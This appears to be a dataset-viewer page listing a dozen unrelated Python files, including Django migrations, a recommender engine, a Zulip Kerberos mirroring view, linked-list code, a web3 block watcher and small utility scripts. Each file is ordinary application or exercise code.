]
operations = [
migrations.AlterField(
model_name='profile',
name='bio',
field=models.TextField(default='Bio'),
),
migrations.AlterField(
model_name='profile',
name='status',
field=models.CharField(default='Status', max_length=100),
),
]
|
"""
Recommendations Engine
===============
Business Objective:
To recommend applications to users that they might find useful in their everyday objectives
Website Link: https://github.com/aml-development/ozp-documentation/wiki/Recommender-%282017%29
Data that could be used for recommendations
- Listing Bookmarked
- Keep track of folder apps
Recommendations are based on individual users
Assumptions:
45,000 Users
350 Listings
Worst Case Number of Recommendations = 15,750,000
Steps:
- Load Data for each users
- Process Data with recommendation algorthim
- Produces a list of listing's id for each profile = Results
- Iterate through the Results to call add_listing_to_user_profile function
Idea:
Jitting Result
"""
import logging
import time
import msgpack
from django.core.exceptions import ObjectDoesNotExist
from django.db.models import Count
from django.db import transaction
from django.conf import settings
from ozpcenter import models
from ozpcenter.recommend import recommend_utils
from ozpcenter.recommend import recommend_es
from ozpcenter.recommend.graph_factory import GraphFactory
from ozpcenter.api.listing.elasticsearch_util import elasticsearch_factory
logger = logging.getLogger('ozp-center.' + str(__name__))
class ProfileResultSet(object):
def __init__(self):
"""
recommender_result_set: Dictionary with profile id, nested listing id with score pairs
{
profile_id#1: {
listing_id#1: score#1,
listing_id#2: score#2
},
profile_id#2: {
listing_id#1: score#1,
listing_id#2: score#2,
listing_id#3: score#3,
}
}
"""
self.recommender_result_set = {}
def add_listing_to_user_profile(self, profile_id, listing_id, score, cumulative=False):
if profile_id in self.recommender_result_set:
if self.recommender_result_set[profile_id].get(listing_id):
if cumulative:
self.recommender_result_set[profile_id][listing_id] = self.recommender_result_set[profile_id][listing_id] + float(score)
else:
self.recommender_result_set[profile_id][listing_id] = float(score)
else:
self.recommender_result_set[profile_id][listing_id] = float(score)
else:
self.recommender_result_set[profile_id] = {}
self.recommender_result_set[profile_id][listing_id] = float(score)
class RecommenderProfileResultSet(object):
def __init__(self, profile_id):
"""
profile_id:
Data:
{
recommender_friendly_name#1:{
recommendations:{
listing_id#1: score#1,
listing_id#2: score#2
}
weight: 1.0,
ms_took: 3000
},
recommender_friendly_name#2:{
recommendations:{
listing_id#1: score#1,
listing_id#2: score#2,
listing_id#3: score#3,
}
weight: 1.0
ms_took: 5050
}
}
"""
self.profile_id = profile_id
self.recommender_result_set = {}
def merge(self, recommender_friendly_name, recommendation_weight, current_recommendations, recommendations_time):
"""
Purpose is to merge all of the different Recommender's algorthim recommender result together.
This function is responsible for merging the results of the other Recommender recommender_result_set diction into self recommender_result_set
Args:
friendly_name: Recommender friendly name
recommendation_weight: Recommender weight
profile_result_set(ProfileResultSet): Recommender results
recommendations_time: Recommender time
"""
if recommender_friendly_name not in self.recommender_result_set:
self.recommender_result_set[recommender_friendly_name] = {
'recommendations': current_recommendations,
'weight': recommendation_weight,
'ms_took': recommendations_time
}
def __repr__(self):
return str(self.recommender_result_set)
class RecommenderResultSet(object):
def __init__(self):
"""
{
profile_id#1: RecommenderProfileResultSet(),
profile_id#2: RecommenderProfileResultSet(),
}
recommender_result_set serialized
{
profile_id#1: {
recommender_friendly_name#1:{
recommendations:[
[listing_id#1, score#1],
[listing_id#2, score#2]
]
weight: 1.0
ms_took: 5050
},
recommender_friendly_name#2:{
recommendations:[
[listing_id#1, score#1],
[listing_id#2, score#2]
]
weight: 2.0
ms_took: 5050
}
},
profile_id#2: {
recommender_friendly_name#1:{
recommendations:[
[listing_id#1, score#1],
[listing_id#2, score#2]
]
weight: 1.0,
ms_took: 5050
},
recommender_friendly_name#2:{
recommendations:[
[listing_id#1, score#1],
[listing_id#2, score#2]
]
weight: 1.0
ms_took: 5050
}
}
}
"""
self.recommender_result_set = {}
def __repr__(self):
return str(self.recommender_result_set)
def merge(self, recommender_friendly_name, recommendation_weight, profile_result_set, recommendations_time):
"""
Purpose is to merge all of the different Recommender's algorthim recommender result together.
This function is responsible for merging the results of the other Recommender recommender_result_set diction into self recommender_result_set
Args:
friendly_name: Recommender friendly name
recommendation_weight: Recommender weight
profile_result_set(ProfileResultSet): Recommender results
recommendations_time: Recommender time
"""
for profile_id in profile_result_set.recommender_result_set:
if profile_id not in self.recommender_result_set:
self.recommender_result_set[profile_id] = RecommenderProfileResultSet(profile_id)
current_recommendations = profile_result_set.recommender_result_set[profile_id]
self.recommender_result_set[profile_id].merge(recommender_friendly_name, recommendation_weight, current_recommendations, recommendations_time)
class BaselineRecommender(object):
"""
Baseline Recommender
Assumptions:
- Listing has ratings and possible not to have ratings
- Listing can be featured
- User bookmark Listings
- User have bookmark folder, a collection of listing in a folder.
- Listing has total_reviews field
Requirements:
- Recommendations should be explainable and believable
- Must respect private apps
- Does not have to repect security_marking while saving to db
"""
friendly_name = 'Baseline'
recommendation_weight = 1.0
def initiate(self):
"""
Initiate any variables needed for recommendation_logic function
"""
pass
def recommendation_logic(self):
"""
Sample Recommendations for all users
"""
all_profiles = models.Profile.objects.all()
all_profiles_count = len(all_profiles)
current_profile_count = 0
for profile in all_profiles:
current_profile_count = current_profile_count + 1
logger.debug('Calculating Profile {}/{}'.format(current_profile_count, all_profiles_count))
profile_id = profile.id
profile_username = profile.user.username
# Get Featured Listings
featured_listings = models.Listing.objects.for_user_organization_minus_security_markings(
profile_username).order_by('-approved_date').filter(
is_featured=True,
approval_status=models.Listing.APPROVED,
is_enabled=True,
is_deleted=False)[:36]
for current_listing in featured_listings:
self.profile_result_set.add_listing_to_user_profile(profile_id, current_listing.id, 3.0, True)
# Get Recent Listings
recent_listings = models.Listing.objects.for_user_organization_minus_security_markings(
profile_username).order_by(
'-approved_date').filter(
is_featured=False,
approval_status=models.Listing.APPROVED,
is_enabled=True,
is_deleted=False)[:36]
for current_listing in recent_listings:
self.profile_result_set.add_listing_to_user_profile(profile_id, current_listing.id, 2.0, True)
# Get most popular listings via a weighted average
most_popular_listings = models.Listing.objects.for_user_organization_minus_security_markings(
profile_username).filter(
approval_status=models.Listing.APPROVED,
is_enabled=True,
is_deleted=False).order_by('-avg_rate', '-total_reviews')[:36]
for current_listing in most_popular_listings:
if current_listing.avg_rate != 0:
self.profile_result_set.add_listing_to_user_profile(profile_id, current_listing.id, current_listing.avg_rate, True)
# Get most popular bookmarked apps for all users
# Would it be faster it this code was outside the loop for profiles?
library_entries = models.ApplicationLibraryEntry.objects.for_user_organization_minus_security_markings(profile_username)
library_entries = library_entries.filter(listing__is_enabled=True)
library_entries = library_entries.filter(listing__is_deleted=False)
library_entries = library_entries.filter(listing__approval_status=models.Listing.APPROVED)
library_entries_group_by_count = library_entries.values('listing_id').annotate(count=Count('listing_id')).order_by('-count')
# [{'listing_id': 1, 'count': 1}, {'listing_id': 2, 'count': 1}]
# Calculation of Min and Max new scores dynamically. This will increase the values that are lower
# to a range within 2 and 5, but will not cause values higher than new_min and new_max to become even
# larger.
old_min = 1
old_max = 1
new_min = 2
new_max = 5
for entry in library_entries_group_by_count:
count = entry['count']
if count == 0:
continue
if count > old_max:
old_max = count
if count < old_min:
old_min = count
for entry in library_entries_group_by_count:
listing_id = entry['listing_id']
count = entry['count']
calculation = recommend_utils.map_numbers(count, old_min, old_max, new_min, new_max)
self.profile_result_set.add_listing_to_user_profile(profile_id, listing_id, calculation, True)
class GraphCollaborativeFilteringBaseRecommender(object):
"""
Graph Collaborative Filtering based on Bookmarkes
"""
friendly_name = 'Bookmark Collaborative Filtering'
recommendation_weight = 5.0
def initiate(self):
"""
Initiate any variables needed for recommendation_logic function
"""
self.graph = GraphFactory.load_db_into_graph()
self.all_profiles = models.Profile.objects.all()
self.all_profiles_count = len(self.all_profiles)
def recommendation_logic(self):
"""
Recommendation logic
"""
current_profile_count = 0
for profile in self.all_profiles:
profile_id = profile.id
current_profile_count = current_profile_count + 1
logger.debug('Calculating Profile {}/{}'.format(current_profile_count, self.all_profiles_count))
results = self.graph.algo().recommend_listings_for_profile('p-{}'.format(profile_id)) # bigbrother
for current_tuple in results:
listing_raw = current_tuple[0] # 'l-#'
listing_id = int(listing_raw.split('-')[1])
score = current_tuple[1]
# No need to rebase since results are within the range of others based on testing:
self.profile_result_set.add_listing_to_user_profile(profile_id, listing_id, score)
# Method is decorated with @transaction.atomic to ensure all logic is executed in a single transaction
@transaction.atomic
def bulk_recommendations_saver(recommendation_entries):
# Loop over each store and invoke save() on each entry
for recommendation_entry in recommendation_entries:
target_profile = recommendation_entry['target_profile']
recommendation_data = recommendation_entry['recommendation_data']
# models.RecommendationsEntry.objects.filter(target_profile__in=profile_query).delete() occured
# try:
# obj = models.RecommendationsEntry.objects.get(target_profile=target_profile)
# obj.recommendation_data = recommendation_data
# obj.save()
# except models.RecommendationsEntry.DoesNotExist:
recommendation_entry_obj = models.RecommendationsEntry(target_profile=target_profile, recommendation_data=recommendation_data)
recommendation_entry_obj.save()
class RecommenderDirectory(object):
"""
Wrapper for all Recommenders
"""
def __init__(self):
self.recommender_classes = {
'elasticsearch_user_base': recommend_es.ElasticsearchUserBaseRecommender,
'elasticsearch_content_base': recommend_es.ElasticsearchContentBaseRecommender,
'baseline': BaselineRecommender,
'graph_cf': GraphCollaborativeFilteringBaseRecommender,
}
self.recommender_result_set_obj = RecommenderResultSet()
def _iterate_recommenders(self, recommender_string):
"""
Convert recommender string into Recommender instances
"""
for current_recommender in recommender_string.split(','):
current_recommender_string = current_recommender.strip()
if current_recommender_string in self.recommender_classes:
current_recommender_obj = self.recommender_classes[current_recommender_string]()
current_recommender_obj.profile_result_set = ProfileResultSet()
current_recommender_class = current_recommender_obj.__class__
friendly_name = current_recommender_class.__name__
if hasattr(current_recommender_class, 'friendly_name'):
friendly_name = current_recommender_class.friendly_name
recommendation_weight = 1.0
if hasattr(current_recommender_class, 'recommendation_weight'):
recommendation_weight = current_recommender_class.recommendation_weight
yield current_recommender_obj, friendly_name, recommendation_weight
else:
logger.warn('Recommender Engine [{}] Not Found'.format(current_recommender))
def recommend(self, recommender_string):
"""
Creates Recommender Object, and execute the recommend
Args:
recommender_string: Comma Delimited list of Recommender Engine to execute
"""
start_ms = time.time() * 1000.0
for recommender_obj, friendly_name, recommendation_weight in self._iterate_recommenders(recommender_string):
logger.info('=={}=='.format(friendly_name))
if hasattr(recommender_obj, 'initiate'):
# initiate - Used for initiating variables, classes, objects, connecting to service
recommender_obj.initiate()
recommendations_start_ms = time.time() * 1000.0
if not hasattr(recommender_obj, 'recommendation_logic'):
raise Exception('Recommender instance needs recommendation_logic method')
recommender_obj.recommendation_logic()
profile_result_set = recommender_obj.profile_result_set
logger.debug(profile_result_set)
recommendations_end_ms = time.time() * 1000.0
recommendations_time = recommendations_end_ms - recommendations_start_ms
logger.info('Merging {} into results'.format(friendly_name))
self.recommender_result_set_obj.merge(friendly_name, recommendation_weight, profile_result_set, recommendations_time)
logger.info('==Start saving recommendations into database==')
start_db_ms = time.time() * 1000.0
self.save_to_db()
end_db_ms = time.time() * 1000.0
logger.info('Save to database took: {} ms'.format(end_db_ms - start_db_ms))
logger.info('Whole Process: {} ms'.format(end_db_ms - start_ms))
def save_to_db(self):
"""
This function is responsible for storing the recommendations into the database
# Pre-refactor - Save to database took: 2477.896240234375 ms, Database Calls: 1178
# Post-refactor - Save to database took: 101.677978515625 ms, Database Calls: 584
Performance:
transaction.atomic() - 430 ms
Without Atomic and Batch - 1400 ms
"""
recommender_result_set = self.recommender_result_set_obj.recommender_result_set
batch_list = []
# Get all profiles in recommender_result_set
profile_id_list = list(set([profile_id for profile_id in recommender_result_set]))
profile_query = models.Profile.objects.filter(id__in=profile_id_list)
profile_dict = {profile.id: profile for profile in profile_query}
listing_dict = {listing.id: listing for listing in models.Listing.objects.all()}
# Delete RecommendationsEntry Entries for profiles
profile_query = models.Profile.objects.filter(id__in=profile_id_list)
models.RecommendationsEntry.objects.filter(target_profile__in=profile_query).delete()
for profile_id in recommender_result_set:
# print('*-*-*-*-'); import json; print(json.dumps(self.recommender_result_set[profile_id])); print('*-*-*-*-')
profile = profile_dict.get(profile_id)
if profile:
for current_recommender_friendly_name in recommender_result_set[profile_id].recommender_result_set:
output_current_tuples = []
current_recommendations = recommender_result_set[profile_id].recommender_result_set[current_recommender_friendly_name]['recommendations']
sorted_recommendations = recommend_utils.get_top_n_score(current_recommendations, 20)
for current_recommendation_tuple in sorted_recommendations:
current_listing_id = current_recommendation_tuple[0]
# current_listing_score = current_recommendation_tuple[1]
current_listing = listing_dict.get(current_listing_id)
if current_listing:
output_current_tuples.append(current_recommendation_tuple)
recommender_result_set[profile_id].recommender_result_set[current_recommender_friendly_name]['recommendations'] = output_current_tuples
batch_list.append({'target_profile': profile,
'recommendation_data': msgpack.packb(recommender_result_set[profile_id].recommender_result_set)})
if len(batch_list) >= 1000:
bulk_recommendations_saver(batch_list)
batch_list = []
if batch_list:
bulk_recommendations_saver(batch_list)
|
import base64
import logging
import re
import shlex
import subprocess
from email.headerregistry import Address
from typing import Optional
import orjson
from django.conf import settings
from django.http import HttpRequest, HttpResponse
from django.utils.translation import gettext as _
from zerver.decorator import authenticated_json_view
from zerver.lib.ccache import make_ccache
from zerver.lib.exceptions import JsonableError
from zerver.lib.pysa import mark_sanitized
from zerver.lib.request import REQ, has_request_variables
from zerver.lib.response import json_success
from zerver.lib.users import get_api_key
from zerver.models import UserProfile
# Hack for mit.edu users whose Kerberos usernames don't match what they zephyr
# as. The key is for Kerberos and the value is for zephyr.
kerberos_alter_egos = {
"golem": "ctl",
}
@authenticated_json_view
@has_request_variables
def webathena_kerberos_login(
request: HttpRequest, user_profile: UserProfile, cred: Optional[str] = REQ(default=None)
) -> HttpResponse:
if cred is None:
raise JsonableError(_("Could not find Kerberos credential"))
if not user_profile.realm.webathena_enabled:
raise JsonableError(_("Webathena login not enabled"))
try:
parsed_cred = orjson.loads(cred)
user = parsed_cred["cname"]["nameString"][0]
if user in kerberos_alter_egos:
user = kerberos_alter_egos[user]
assert user == Address(addr_spec=user_profile.email).username
# Limit characters in usernames to valid MIT usernames
# This is important for security since DNS is not secure.
assert re.match(r"^[a-z0-9_.-]+$", user) is not None
ccache = make_ccache(parsed_cred)
# 'user' has been verified to contain only benign characters that won't
# help with shell injection.
user = mark_sanitized(user)
# 'ccache' is only written to disk by the script and used as a kerberos
# credential cache file.
ccache = mark_sanitized(ccache)
except Exception:
raise JsonableError(_("Invalid Kerberos cache"))
if settings.PERSONAL_ZMIRROR_SERVER is None:
logging.error("PERSONAL_ZMIRROR_SERVER is not properly configured", stack_info=True)
raise JsonableError(_("We were unable to set up mirroring for you"))
# TODO: Send these data via (say) RabbitMQ
try:
api_key = get_api_key(user_profile)
command = [
"/home/zulip/python-zulip-api/zulip/integrations/zephyr/process_ccache",
user,
api_key,
base64.b64encode(ccache).decode(),
]
subprocess.check_call(["ssh", settings.PERSONAL_ZMIRROR_SERVER, "--", shlex.join(command)])
except subprocess.CalledProcessError:
logging.exception("Error updating the user's ccache", stack_info=True)
raise JsonableError(_("We were unable to set up mirroring for you"))
return json_success(request)
|
# @Time : 2021/2/1 11:42 下午
# @Author : Xingyou Chen
# @File : linklist_postorder.py
# @Software: PyCharm
class linknode():
def __init__(self, value):
self.data = value
self.next = None
def create_link(li):
head = linknode(li[0])
now = head
for i in li[1:]:
now.next = linknode(i)
now = now.next #最后一个的尾指针为None
return head
def print_link(head):
"""
:param head: 头结点,是一个链表对象
:return:
"""
if head == None:
return None
else:
node = head
while node != None:
print(node.data)
node = node.next
li = [3,4,5,1,2]
head = create_link(li)
print_link(head)
def reverseLink(head):
"""
思路:从头处理至尾,①先将存当前节点的下一个节点暂存,②再将当前节点的下一个节点指向上一个处理过的节点,③把当前节点作为处理过的,④把暂存的变为当前的
需要变量:pre:处理过的,cur:当前的
:param head:
:return:
"""
pre = None # 刚处理过的节点
cur = head # 待处理节点
while cur: # 尾节点的next为None
tmp = cur.next # 记住当前节点的下一个节点
cur.next = pre # 将当前节点的下一个节点指向上一个处理过的节点
pre = cur # 将当前节点变为处理过的节点
cur = tmp # 将当前节点的下一个节点变为待处理节点
return pre
reverse = reverseLink(head)
print_link(reverse)
|
# Generated by Django 2.2.6 on 2019-10-17 14:53
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('picker', '0005_auto_20190331_1043'),
]
operations = [
migrations.AddField(
model_name='credential',
name='extractor_url',
field=models.CharField(blank=True, default='http://localhost:5000/api/subscribe', max_length=200),
),
migrations.AlterField(
model_name='credential',
name='touch',
field=models.BooleanField(default=True),
),
]
|
from web3 import Web3
from web3.utils.encoding import to_hex
import time
w3 = Web3(Web3.HTTPProvider('http://localhost:8545'))
filter = w3.eth.filter('latest')
while True:
for blk_hash in filter.get_new_entries():
block = w3.eth.getBlock(blk_hash,True)
for tx in block.transactions:
print('tx data => {0}'.format(tx.input))
time.sleep(2)
|
"""
Reads mail templates into memory and provides functions to format them.
"""
with open('mail_templates/verification_html.txt', 'r') as f:
_verification_mail_html = f.read()
with open('mail_templates/verification_plain.txt', 'r') as f:
_verification_mail_plain = f.read()
def format_verification_mail_html(username, verification_url, expiration_date):
"""
Format an HTML verification mail.
:param username: Username to use in the mail.
:param verification_url: Verification link to use in the mail.
:param expiration_date: Expiration date of the verification code.
:return: The formatted HTML verification mail.
"""
return _verification_mail_html.format(username=username,
verification_url=verification_url,
expiration_date=expiration_date)
def format_verification_mail_plain(username, verification_url, expiration_date):
"""
Format a plaintext verification mail.
:param username: Username to use in the mail.
:param verification_url: Verification link to use in the mail.
:param expiration_date: Expiration date of the verification code.
:return: The formatted plaintext verification mail.
"""
return _verification_mail_plain.format(username=username,
verification_url=verification_url,
expiration_date=expiration_date)
|
from django.shortcuts import render
from django.http import HttpResponse
from todo.models import Todo
# Create your views here.
def home(request):
if request.method == 'POST':
todo = request.POST['todo'].strip()
priority = request.POST['priority'].strip()
Todo.objects.create(todo=todo, priority=priority)
else:
pass
post_list = Todo.objects.all()
return render(request, 'home.html', {'post_list' : post_list})
#return HttpResponse("Hello World, Django")
#def detail(request, my_args):
# post = Todo.objects.all()[int(my_args)]
# str_content = ("todo = %s, priority = %s" % (post.todo, post.priority))
# return HttpResponse(str_content)
|
#!/usr/bin/env python
from optparse import OptionParser
from tracker_module import *
from predict import *
from tracker_gui import *
import sys
if __name__ == '__main__':
#--------START Command Line option parser------------------------------------------------
usage = "usage: %prog -a <Server Address> -p <Server Port> "
parser = OptionParser(usage = usage)
pred_ip_h = "IP address of Predict Server, Default: 127.0.0.1"
pred_port_h = "Port Number of Predict Server, Default: 1210"
track_ip_h = "IP address of tracker, Default: 192.168.20.3"
track_port_h = "TCP port number of tracker, Default: 196"
sat_id_h = "Satellite ID, NORAD ID # or Sat Name"
interval_h = "Predict Update Interval, default = 1.0 seconds"
parser.add_option("--predict-ip" , dest = "pred_ip" , action = "store", type = "string", default = "127.0.0.1", help = pred_ip_h)
parser.add_option("--predict-port", dest = "pred_port" , action = "store", type = "int" , default = "1210" , help = pred_port_h)
parser.add_option("--tracker-ip" , dest = "track_ip" , action = "store", type = "string", default = "192.168.20.3", help = track_ip_h)
parser.add_option("--tracker-port", dest = "track_port", action = "store", type = "int" , default = "196" , help = track_port_h)
parser.add_option("--sat-id" , dest = "sat_id" , action = "store", type = "string", default = "" , help = sat_id_h)
parser.add_option("--interval" , dest = "interval" , action = "store", type = "float" , default = "1.0" , help = interval_h)
(options, args) = parser.parse_args()
#--------END Command Line option parser-------------------------------------------------
#pt = Predict_Thread(options)
#tt = Tracker_Thread(options)
#dt = Display_Thread(options, tt, pt)
#pt.daemon = True
#tt.daemon = True
#dt.daemon = True
#pt.start()
#tt.start()
#dt.run()
#sys.exit()
app = QtGui.QApplication(sys.argv)
ex = tracker_main_gui()
sys.exit(app.exec_())
#stop_flag = False
#while not stop_flag:
# os.system("clear")
# command = raw_input("Enter WAAA EEE or (q)uit: ")
# if command == 'q':
# stop_flag = True
# print "terminating, please wait..."
# else:
# tt.Write_Raw_Message(command)
#dt.run()
#print "terminating, please wait..."
#tt.stop()
#dt.stop()
#pt.join()
|
from architecture.service_structure import ServiceStructure
from interaction.chatbots.minuteur_chatbot import MinuteurChatBot
from interaction.recognition import RecognitionStates
import base64
import time
import threading
class ConversationStates:
ANSWER_FOUND = "Answer found"
ANSWER_NOT_FOUND = "Answer not found"
class Conversation(ServiceStructure):
def __init__(self, services_handle):
super().__init__(services_handle)
self.name = "Conversation"
self.configuration_json = None
self.chatbots_list = []
self.keyword_list = []
self.set_configuration()
def set_configuration(self):
self.chatbots_list = [MinuteurChatBot(self.services, find_number=True)]
self.keyword_list = [chatbot.keyword for chatbot in self.chatbots_list]
def switch_conversation_state(self, state):
print("switch recording state")
self.services.leds.set_mode(state)
time.sleep(2)
self.services.recognition.switch_recognition_state(RecognitionStates.IDLE)
def switch_conversation_state_thread(self, state):
threading.Thread(target=lambda: self.switch_conversation_state(state)).start()
def start_interaction(self):
recognition_dict = self.services.recognition.start_recognition()
if recognition_dict["success"]:
result, language, confidence = recognition_dict["results"]
print(self.keyword_list)
answer = ""
for index, keyword in enumerate(self.keyword_list):
if keyword+ " " in result:
print("start chatbot with keyword {}".format(keyword))
chatbot = self.chatbots_list[index]
answer = self.chatbots_list[index].get_answer(result, language)
if answer:
self.switch_conversation_state_thread(ConversationStates.ANSWER_FOUND)
print(answer)
answer_wav = base64.b64decode(self.services.google_handle.text_to_speech_api(answer, language).encode('ascii'))
self.services.audio_player.play_from_wav_content(answer_wav)
else:
self.switch_conversation_state_thread(ConversationStates.ANSWER_NOT_FOUND)
time.sleep(2)
else:
self.switch_conversation_state_thread(ConversationStates.ANSWER_NOT_FOUND)
|
import requests
from base64 import b64encode
from color import Color
import string
import random
images = 10
size = 64
types = ['jpeg', 'png', 'gif']
file_path = "../js/photos.js"
chars = string.ascii_letters + string.digits
def gen_id(length = 2, chars = chars):
return ''.join(random.choice(chars) for x in range(length))
def gen_params(images):
params = []
c = Color()
for i in range(0, images):
el = {}
el['color'] = c.rnd_color()
el['contrast'] = c.contrast()
el['id'] = gen_id()
params.append(el)
return params
def get_image(size, back_color, text_color, type, text):
url = "http://dummyimage.com/%d/%s/%s.%s&text=%s" % (size, back_color, text_color, type, text)
print url
r = requests.get(url)
return r.content if r.status_code == 200 else ""
def gen_js_file(images, size, types, file_path):
with open(file_path, 'w') as f:
params = gen_params(images)
f.write("var photos = {\n")
for i, type in enumerate(types):
f.write("\t%s: [" % type)
for j in range(0, images):
temp = get_image(size, params[j]['color'], params[j]['contrast'], type, params[j]['id'])
f.write("\n\t\t\"%s\", " % b64encode(temp)) if j < (images - 1) else f.write("\n\t\t\"%s\"" % b64encode(temp))
f.write("\n\t],\n") if i < (len(types) - 1) else f.write("\n\t]\n")
f.write("};")
if __name__ == "__main__":
gen_js_file(images, size, types, file_path)
|
from win32api import GetKeyState, mouse_event
from win32con import MOUSEEVENTF_WHEEL
def key_down(key):
keystate = GetKeyState(key)
if (keystate==0) or (keystate==1):
return 0
else:
return 1
def scroll_wheel_forward(x,y):
if mouse_event(MOUSEEVENTF_WHEEL,x,y) > 0:
return 1
else:
return 0
def scroll_wheel_backward(x,y):
if mouse_event(MOUSEEVENTF_WHEEL,x,y) < 0:
return 1
else:
return 0
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.